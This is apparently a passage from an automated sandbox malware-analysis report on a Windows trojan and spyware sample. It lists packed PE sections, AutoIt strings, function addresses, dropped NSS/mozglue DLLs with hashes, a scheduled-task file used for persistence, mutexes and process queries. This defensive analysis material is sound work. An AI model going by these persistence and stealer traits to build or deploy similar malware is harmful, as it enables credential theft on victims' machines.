Source: 2922d7c574.exe, 00000011.00000002.2812872415.0000000000A12000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_66671215-1
Source: 2922d7c574.exe, 00000025.00000000.2882255314.0000000000A12000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: This is a third-party compiled AutoIt script.	memstr_d6732cef-4
Source: 2922d7c574.exe, 00000025.00000000.2882255314.0000000000A12000.00000002.00000001.01000000.00000011.sdmp	String found in binary or memory: AnyArabicArmenianAvestanBalineseBamumBassa_VahBatakBengaliBopomofoBrahmiBrailleBugineseBuhidCCanadian_AboriginalCarianCaucasian_AlbanianCcCfChakmaChamCherokeeCnCoCommonCopticCsCuneiformCypriotCyrillicDeseretDevanagariDuployanEgyptian_HieroglyphsElbasanEthiopicGeorgianGlagoliticGothicGranthaGreekGujaratiGurmukhiHanHangulHanunooHebrewHiraganaImperial_AramaicInheritedInscriptional_PahlaviInscriptional_ParthianJavaneseKaithiKannadaKatakanaKayah_LiKharoshthiKhmerKhojkiKhudawadiLL&LaoLatinLepchaLimbuLinear_ALinear_BLisuLlLmLoLtLuLycianLydianMMahajaniMalayalamMandaicManichaeanMcMeMeetei_MayekMende_KikakuiMeroitic_CursiveMeroitic_HieroglyphsMiaoMnModiMongolianMroMyanmarNNabataeanNdNew_Tai_LueNkoNlNoOghamOl_ChikiOld_ItalicOld_North_ArabianOld_PermicOld_PersianOld_South_ArabianOld_TurkicOriyaOsmanyaPPahawh_HmongPalmyrenePau_Cin_HauPcPdPePfPhags_PaPhoenicianPiPoPsPsalter_PahlaviRejangRunicSSamaritanSaurashtraScSharadaShavianSiddhamSinhalaSkSmSoSora_SompengSundaneseSyloti_NagriSyriacTagalogTagbanwaTai_LeTai_ThamTai_VietTakriTamilTeluguThaanaThaiTibetanTifinaghTirhutaUgariticVaiWarang_CitiXanXpsXspXucXwdYiZZlZpZsSDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBoxSHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer	memstr_b6a0e6f8-d

PE file contains section with special chars

Source: file.exe	Static PE information: section name:
Source: file.exe	Static PE information: section name: .idata
Source: file.exe	Static PE information: section name:
Source: DocumentsKECFIDGCBF.exe.0.dr	Static PE information: section name:
Source: DocumentsKECFIDGCBF.exe.0.dr	Static PE information: section name: .idata
Source: DocumentsKECFIDGCBF.exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name:
Source: random[1].exe.0.dr	Static PE information: section name: .rsrc
Source: random[1].exe.0.dr	Static PE information: section name: .idata
Source: random[1].exe.0.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name:
Source: skotes.exe.9.dr	Static PE information: section name: .idata
Source: skotes.exe.9.dr	Static PE information: section name:
Source: fa55e7c5ed.exe.11.dr	Static PE information: section name:
Source: fa55e7c5ed.exe.11.dr	Static PE information: section name: .rsrc
Source: fa55e7c5ed.exe.11.dr	Static PE information: section name: .idata
Source: fa55e7c5ed.exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name:
Source: random[1].exe.11.dr	Static PE information: section name: .idata
Source: random[1].exe.11.dr	Static PE information: section name:
Source: 0718eb7837.exe.11.dr	Static PE information: section name:
Source: 0718eb7837.exe.11.dr	Static PE information: section name: .idata
Source: 0718eb7837.exe.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: random[1].exe0.11.dr	Static PE information: section name: .idata
Source: random[1].exe0.11.dr	Static PE information: section name:
Source: aedbd2e320.exe.11.dr	Static PE information: section name:
Source: aedbd2e320.exe.11.dr	Static PE information: section name: .idata
Source: aedbd2e320.exe.11.dr	Static PE information: section name:
Source: random[2].exe.11.dr	Static PE information: section name:
Source: random[2].exe.11.dr	Static PE information: section name: .idata
Source: 2aff342b40.exe.11.dr	Static PE information: section name:
Source: 2aff342b40.exe.11.dr	Static PE information: section name: .idata

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6862C0 PR_dtoa,PR_GetCurrentThread,strlen,NtFlushVirtualMemory,PR_GetCurrentThread,memcpy,memcpy,

0_2_6C6862C0

Source: C:\Users\user\DocumentsKECFIDGCBF.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C50AC60	0_2_6C50AC60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C6C00	0_2_6C5C6C00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DAC30	0_2_6C5DAC30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C55ECD0	0_2_6C55ECD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4FECC0	0_2_6C4FECC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CED70	0_2_6C5CED70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62AD50	0_2_6C62AD50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C688D20	0_2_6C688D20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C68CDC0	0_2_6C68CDC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C596D90	0_2_6C596D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C504DB0	0_2_6C504DB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59EE70	0_2_6C59EE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E0E20	0_2_6C5E0E20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C50AEC0	0_2_6C50AEC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A0EC0	0_2_6C5A0EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C586E90	0_2_6C586E90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C56EF40	0_2_6C56EF40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C2F70	0_2_6C5C2F70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C506F10	0_2_6C506F10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C640F20	0_2_6C640F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DEFF0	0_2_6C5DEFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C500FE0	0_2_6C500FE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C648FB0	0_2_6C648FB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C50EFB0	0_2_6C50EFB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D4840	0_2_6C5D4840
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C550820	0_2_6C550820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58A820	0_2_6C58A820
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6068E0	0_2_6C6068E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C538960	0_2_6C538960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C556900	0_2_6C556900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C61C9E0	0_2_6C61C9E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5349F0	0_2_6C5349F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C09B0	0_2_6C5C09B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5909A0	0_2_6C5909A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BA9A0	0_2_6C5BA9A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C57CA70	0_2_6C57CA70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5AEA00	0_2_6C5AEA00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B8A30	0_2_6C5B8A30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C57EA80	0_2_6C57EA80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C606BE0	0_2_6C606BE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A0BA0	0_2_6C5A0BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C508BAC	0_2_6C508BAC
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C518460	0_2_6C518460
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58A430	0_2_6C58A430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C564420	0_2_6C564420
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5464D0	0_2_6C5464D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59A4D0	0_2_6C59A4D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C62A480	0_2_6C62A480
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C558540	0_2_6C558540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C604540	0_2_6C604540
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A0570	0_2_6C5A0570
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C648550	0_2_6C648550
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C562560	0_2_6C562560
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58E5F0	0_2_6C58E5F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CA5E0	0_2_6C5CA5E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4F45B0	0_2_6C4F45B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C55C650	0_2_6C55C650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5246D0	0_2_6C5246D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C55E6E0	0_2_6C55E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59E6E0	0_2_6C59E6E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C580700	0_2_6C580700
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C52A7D0	0_2_6C52A7D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C54E070	0_2_6C54E070
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C8010	0_2_6C5C8010
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CC000	0_2_6C5CC000
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4F8090	0_2_6C4F8090
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5100B0	0_2_6C5100B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DC0B0	0_2_6C5DC0B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C568140	0_2_6C568140
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C576130	0_2_6C576130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E4130	0_2_6C5E4130
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5001E0	0_2_6C5001E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6561B0	0_2_6C6561B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C598250	0_2_6C598250
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C588260	0_2_6C588260
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CA210	0_2_6C5CA210
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D8220	0_2_6C5D8220
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6862C0	0_2_6C6862C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C51A2B0	0_2_6C51A2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5CE2B0	0_2_6C5CE2B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D22A0	0_2_6C5D22A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C61C360	0_2_6C61C360
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C508340	0_2_6C508340
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C642370	0_2_6C642370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C502370	0_2_6C502370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C596370	0_2_6C596370
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C572320	0_2_6C572320
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5543E0	0_2_6C5543E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C55E3B0	0_2_6C55E3B0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5323A0	0_2_6C5323A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C503C40	0_2_6C503C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C629C40	0_2_6C629C40
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C511C30	0_2_6C511C30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C63DCD0	0_2_6C63DCD0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C1CE0	0_2_6C5C1CE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59FC80	0_2_6C59FC80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C563D00	0_2_6C563D00
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D1DC0	0_2_6C5D1DC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4F3D80	0_2_6C4F3D80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C649D90	0_2_6C649D90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C685E60	0_2_6C685E60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65BE70	0_2_6C65BE70
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C60DE10	0_2_6C60DE10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C523EC0	0_2_6C523EC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C657F20	0_2_6C657F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C535F20	0_2_6C535F20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4F5F30	0_2_6C4F5F30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C61DFC0	0_2_6C61DFC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C683FC0	0_2_6C683FC0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5ABFF0	0_2_6C5ABFF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C521F90	0_2_6C521F90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C55D810	0_2_6C55D810
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C65B8F0	0_2_6C65B8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C59F8C0	0_2_6C59F8C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DF8F0	0_2_6C5DF8F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C50D8E0	0_2_6C50D8E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5338E0	0_2_6C5338E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C57F960	0_2_6C57F960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5BD960	0_2_6C5BD960
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64F900	0_2_6C64F900
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5B5920	0_2_6C5B5920
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5399D0	0_2_6C5399D0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5999C0	0_2_6C5999C0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5659F0	0_2_6C5659F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5979F0	0_2_6C5979F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5D1990	0_2_6C5D1990
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C511980	0_2_6C511980
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C689A50	0_2_6C689A50
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C53FA10	0_2_6C53FA10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5A1A10	0_2_6C5A1A10
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5FDA30	0_2_6C5FDA30
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C501AE0	0_2_6C501AE0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DDAB0	0_2_6C5DDAB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5DFB60	0_2_6C5DFB60
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C54BB20	0_2_6C54BB20
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C51BBD4	0_2_6C51BBD4
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C547BF0	0_2_6C547BF0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E5B90	0_2_6C5E5B90
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C4F1B80	0_2_6C4F1B80
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5C9BB0	0_2_6C5C9BB0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C559BA0	0_2_6C559BA0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C58D410	0_2_6C58D410
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5E9430	0_2_6C5E9430
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5014E0	0_2_6C5014E0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C6814A0	0_2_6C6814A0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C515510	0_2_6C515510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C567500	0_2_6C567500
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C64F510	0_2_6C64F510
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C5855F0	0_2_6C5855F0
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C539590	0_2_6C539590
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C519650	0_2_6C519650
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C555640	0_2_6C555640
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C577610	0_2_6C577610
Source: C:\Users\user\Desktop\file.exe	Code function: 0_2_6C529600	0_2_6C529600
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_009FE530	11_2_009FE530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00A378BB	11_2_00A378BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00A38860	11_2_00A38860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00A37049	11_2_00A37049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00A331A8	11_2_00A331A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_009F4DE0	11_2_009F4DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00A32D10	11_2_00A32D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00A3779B	11_2_00A3779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_00A27F36	11_2_00A27F36
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_009F4B30	11_2_009F4B30
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA8AF8	14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA8AF8	14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA8AF8	14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA8AF8	14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA8AF8	14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA8AF8	14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA8AF8	14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA8AF8	14_3_05EA8AF8
Source: C:\Users\user\AppData\Local\Temp\1008251001\0718eb7837.exe	Code function: 14_3_05EA8AF8	14_3_05EA8AF8

Source: Joe Sandbox View	Dropped File: C:\ProgramData\freebl3.dll EDD043F2005DBD5902FC421EABB9472A7266950C5CBACA34E2D590B17D12F5FA
Source: Joe Sandbox View	Dropped File: C:\ProgramData\mozglue.dll BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A

Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C523620 appears 97 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C6809D0 appears 220 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C55C5E0 appears 35 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C529B10 appears 107 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C639F30 appears 52 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C68D930 appears 41 times
Source: C:\Users\user\Desktop\file.exe	Code function: String function: 6C68DAE0 appears 48 times

Source: file.exe, 00000000.00000002.2157682349.000000006C6D5000.00000002.00000001.01000000.00000009.sdmp	Binary or memory string: OriginalFilenamenss3.dll0 vs file.exe
Source: file.exe, 00000000.00000002.2157820790.000000006F902000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: OriginalFilenamemozglue.dll0 vs file.exe

Source: file.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: file.exe	Static PE information: Section: wkrmqwho ZLIB complexity 0.9946027695407542
Source: DocumentsKECFIDGCBF.exe.0.dr	Static PE information: Section: ZLIB complexity 0.9976370912806539
Source: DocumentsKECFIDGCBF.exe.0.dr	Static PE information: Section: brwftgiw ZLIB complexity 0.9945341117216118
Source: random[1].exe.0.dr	Static PE information: Section: bgrcdjci ZLIB complexity 0.9944399207746479
Source: skotes.exe.9.dr	Static PE information: Section: ZLIB complexity 0.9976370912806539
Source: skotes.exe.9.dr	Static PE information: Section: brwftgiw ZLIB complexity 0.9945341117216118
Source: fa55e7c5ed.exe.11.dr	Static PE information: Section: bgrcdjci ZLIB complexity 0.9944399207746479
Source: random[1].exe.11.dr	Static PE information: Section: ZLIB complexity 0.9992699795081967
Source: random[1].exe.11.dr	Static PE information: Section: ackgsmri ZLIB complexity 0.9945644946808511
Source: 0718eb7837.exe.11.dr	Static PE information: Section: ZLIB complexity 0.9992699795081967
Source: 0718eb7837.exe.11.dr	Static PE information: Section: ackgsmri ZLIB complexity 0.9945644946808511
Source: random[1].exe0.11.dr	Static PE information: Section: wkrmqwho ZLIB complexity 0.9946027695407542
Source: aedbd2e320.exe.11.dr	Static PE information: Section: wkrmqwho ZLIB complexity 0.9946027695407542

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@94/57@67/12

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C560300 MapViewOfFile,GetLastError,FormatMessageA,PR_LogPrint,GetLastError,PR_SetError,

0_2_6C560300

Source: C:\Users\user\Desktop\file.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\SLHTRKHN.htm

Jump to behavior

Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1448:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7628:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\1008254001\2aff342b40.exe	Mutant created: NULL
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7624:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3664:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3704:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5924:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4556:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7540:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1732:120:WilError_03
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Windows\System32\conhost.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7564:120:WilError_03

Source: C:\Users\user\DocumentsKECFIDGCBF.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
Source: C:\Windows\SysWOW64\taskkill.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime, ParentProcessId FROM Win32_Process
